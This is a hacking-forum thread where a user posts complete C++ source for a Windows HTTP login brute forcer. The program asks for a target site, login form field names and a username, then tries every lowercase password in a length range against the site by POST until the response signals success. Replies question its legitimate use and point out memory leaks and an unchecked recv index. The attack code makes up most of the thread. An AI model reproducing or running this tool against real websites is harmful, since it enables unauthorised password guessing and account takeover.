Brute Forcer Example Source Code

[UnnamedOne]

I have coded this sometime ago for windows, I'll be making a nice brute forcer of this for BT soon. ( Probally tommorow )

Code:

/*
**
** Brute Forcer Example Source Code
** UnnamedOne
** brian_denys@hotmail.com
** hxxp://xxx.remote-exploit.org
**
*/

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <stdarg.h>
#include <iostream.h>
#pragma comment(lib, "ws2_32.lib")

#define ijji "Avatar"
#define SkyGamers ""

SOCKET Conn;
char URL[256];
char Path[256];
char UserVar[256];
char PassVar[256];
char Username[32];
char def_charset[] = "abcdefghijklmnopqrstuvwxyz";
unsigned int inc[128];

// Prototypes
// Connect, send, etc..
int Connect(char* szIP, int szPort);
int guess(char* szUser, char* szPass);
int remotePOST(SOCKET m_sConnection, CHAR* m_cHost, CHAR* m_cPath, CHAR* m_cData, CHAR* m_cReferer, CHAR* m_cCookies);
int End(SOCKET s);
// Brute Force Algoritm Functions
int finished(char *block, char *charset, char *templ);
void increment(char *block, int len, char *charset, char *templ);
void chunk(int start, int end, char *charset, char *templ, char *startblock);
int StartBrute(int min, int max);

int main()
{
	int min, max;
	cout << "Enter URL of target witout hxxp:// (Ex. xxx.targethost.com)" << endl;
	cin >> URL;
	cout << "Enter Path (Ex. /index.php)" << endl;
	cin >> Path;
	cout << "Username variable (Ex. vBulletin_username)" << endl;
	cin >> UserVar;
	cout << "Password variable (Ex. vBulletin_password)" << endl;
	cin >> PassVar;
	cout << "Target Username (Ex. Asshole)" << endl;
	cin >> Username;
	cout << "Minimum characters?" << endl;
	cin >> min;
	cout << "Maximum characters?" << endl;
	cin >> max;
	StartBrute(min,max);
	return 0;
}

int Connect(char* szIP, int szPort)
{
	WSADATA wsaData;
	int iResult;
	SOCKET ConnectSocket;
	sockaddr_in clientService;
	struct hostent* m_hHost;

	iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
	if(iResult != NO_ERROR)
		printf("Error at WSAStartup()\n");

	ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if(ConnectSocket == INVALID_SOCKET)
	{
		printf("Error at socket(): %ld\n", WSAGetLastError());
		WSACleanup();
		return 1;
	}

	m_hHost = gethostbyname(szIP);

	memset( &clientService, 0, sizeof clientService );

	clientService.sin_family = AF_INET;
	clientService.sin_addr = *(struct in_addr *)m_hHost->h_addr;
	clientService.sin_port = htons(szPort);

	if(connect(ConnectSocket, (SOCKADDR*) &clientService, sizeof(clientService)) == SOCKET_ERROR)
	{
		printf( "Failed to connect.\n" );
		WSACleanup();
		return 1;
	}
	else
	{
		//printf("Connected to %s:%d\n", m_hHost->h_name, szPort);
	}

	Conn = ConnectSocket;

	return ConnectSocket;
}

int guess(char* szUser, char* szPass)
{
	int iResult;
	int recvbuflen = 800096;
	char* recvbuf = (char*)malloc(800096);

	char* hxxpURL = (char*)malloc(256);
	sprintf(hxxpURL, "hxxp://%s",URL);

	char* vars = (char*)malloc(256);
	sprintf(vars, "%s=%s&%s=%s",UserVar, szUser, PassVar, szPass);

	remotePOST(Conn, URL, Path, vars, hxxpURL, NULL);

	iResult = recv(Conn, recvbuf, recvbuflen, 0);
	recvbuf[iResult] = 0x00;
	printf("%s",recvbuf);
	char* strip = strstr(recvbuf, (const char*)"changed");
	//printf("%s\n",strip);
	if(strip != NULL){
		MessageBox(NULL,szPass,"Found!",MB_OK);
		ExitProcess(0);
	}

	memset(recvbuf,0,sizeof(recvbuf));

	return 0;
}

int remotePOST(SOCKET m_sConnection, CHAR* m_cHost, CHAR* m_cPath, CHAR* m_cData, CHAR* m_cReferer, CHAR* m_cCookies)
{
	CHAR* m_cCompleteBuffer = (CHAR*)malloc(2096);

	if(m_cCookies)
	{
		sprintf(m_cCompleteBuffer,
			"POST %s "
			"HXXP/1.1\r\n"
			"Host: %s\r\n"
			"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3\r\n"
			"Referer: %s\r\n"
			"Keep-Alive: 300\r\n"
			"Connection: keep-alive\r\n"
			"Cookie: %s\r\n"
			,m_cPath
			,m_cHost
			,m_cReferer
			,m_cCookies);
	}
	else
	{
		sprintf(m_cCompleteBuffer,
			"POST %s "
			"HXXP/1.1\r\n"
			"Host: %s\r\n"
			"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3\r\n"
			"Referer: %s\r\n"
			"Keep-Alive: 300\r\n"
			"Connection: keep-alive\r\n"
			,m_cPath
			,m_cHost
			,m_cReferer);
	}

	CHAR* m_cDummy  = "Content-Type: application/x-www-form-urlencoded\r\n";
	CHAR* m_cDummy2 = (CHAR*)malloc(128);

	INT m_iLength = strlen(m_cData);

	sprintf(m_cDummy2,"Content-Length: %i\r\n\r\n",m_iLength);

	INT m_iReturn = send(m_sConnection,m_cCompleteBuffer,strlen(m_cCompleteBuffer),0);
	
	if(m_iReturn)
	{
		m_iReturn = send(m_sConnection,m_cDummy,strlen(m_cDummy),0);
		
		if(m_iReturn)
		{
			m_iReturn = send(m_sConnection,m_cDummy2,strlen(m_cDummy2),0);
				
				if(m_iReturn)
				{
					m_iReturn = send(m_sConnection,m_cData,strlen(m_cData),0);

					if(m_iReturn)
					{
						free(m_cDummy2);
						free(m_cCompleteBuffer);
						return m_iReturn;
					}
				}
		}
	}

	free(m_cDummy2);
	free(m_cCompleteBuffer);

	return m_iReturn;
}

int End(SOCKET s)
{
	shutdown(s, SD_SEND);
	closesocket(s);
	WSACleanup();

	return 1;
}

// Brute Force Algoritm Functions
// hxxp://darkc0de.com/c0de/c/crunch.txt
int finished(char *block, char *charset, char *templ)
{
	unsigned int i;

	if(templ[0]==0)
	{
		for(i=0;i<strlen(block);i++)
			if(inc[i] < strlen(charset)-1)	return FALSE;
	}
	else
	{
		for(i=0;i<strlen(block);i++)
			if(templ[i]=='@' && (inc[i] < strlen(charset)-1)) return FALSE;
	}

	return TRUE;
}

void increment(char *block, int len, char *charset, char *templ)
{
	int i;

	for(i=strlen(block)-1;i>-1;i--)
	{
		if(templ[0]==0 || templ[i]=='@')
		{
			if(inc[i] < strlen(charset)-1)
			{
				inc[i]++;
				block[i] = charset[inc[i]];
				i=-1;
			}
			else
			{
				block[i] = charset[0];
				inc[i] = 0;
			}
		}
		else
		{
		}
	}
}

void chunk(int start, int end, char *charset, char *templ, char *startblock)
{
	int i,j,k,t;
	char block[128];

	if(end-start <0) return;

	if(templ[0]==0) t=0;
	else		t=1;

	for(i=start;i<=end;i++)
	{
		memset(block,0,sizeof(block));

		for(j=0;j<i;j++)
		{
			if(startblock[0]==0)
			{
				if(t==0)
				{
					block[j] = charset[0];
					inc[j] = 0;
				}
				else
				{
					if(templ[j]=='@')
					{
						block[j] = charset[0];
						inc[j] = 0;
					}
					else			block[j] = templ[j];
				}
			}
			else
			{
				block[j] = startblock[j];

				for(k=0;k<strlen(charset);k++)
					if(block[j]==charset[k]) inc[j] = k;
			}
		}

		printf("Trying: %s\n",block);
		Connect(URL, 80);
		guess(Username, block);
		End(Conn);
		while(!finished(block,charset,templ))
		{
			increment(block,i,charset,templ);
			printf("Trying: %s\n",block);
			Connect(URL, 80);
			guess(Username, block);
			End(Conn);
		}
	}
}

int StartBrute(int min, int max)
{
	char charset[256];
	char templ[256];
	char startblock[256];

	memset(charset,0,sizeof(charset));
	memset(templ,0,sizeof(templ));
	memset(startblock,0,sizeof(startblock));

	strncpy(charset,def_charset,strlen(def_charset));

	chunk(min,max,charset,templ,startblock);

	return 1;
}

[theprez98]

I'm curious as to what legitimate purposes this code could be used for.

[UnnamedOne]

Well if it's not allowed remove ^.^

But I think it is.. Since there's brute forcers included in BT

[theprez98]

Well if it's not allowed remove ^.^

But I think it is.. Since there's brute forcers included in BT

I didn't say it wasn't allowed, I am simply curious as to what legitimate uses this code has.

[Thorn]

It apprears to be HTTP only. Does this offer something that other brute force programs don't have?

[UnnamedOne]

It apprears to be HTTP only. Does this offer something that other brute force programs don't have?

Nope, I just code things like this as a challenge for myself.

[phil128]

UnnamedOne!!! Jus checked out your code. I dont really know c++ tht much but i know C and from what i can see. It's pretty good even if other brute forces do HTTP attacks! It's a start!!!! Keep it up ^_^. Programming jus for the challenge :-D like me :-D

[conte0]

hello,
i haven't tried to compile e run your program, but i have only read your code, so my opinion could be totally wrong.
i think your program expose multiple memory leak, example the function "int guess(char* szUser, char* szPass)" allocate three buffer "char* recvbuf = (char*)malloc(800096);", "char* hxxpURL = (char*)malloc(256);" and "char* vars = (char*)malloc(256);" but never free up they.
also i see you use the return value of function "recv" like index in the recvbuf "iResult = recv(Conn, recvbuf, recvbuflen, 0); recvbuf[iResult] = 0x00;", its is dangerous, "recv" could return -1!!!!
sorry if i bother you, i hope my post is usefull.

[masliko]

What language is this written in?(sorry i don't know any programming at all)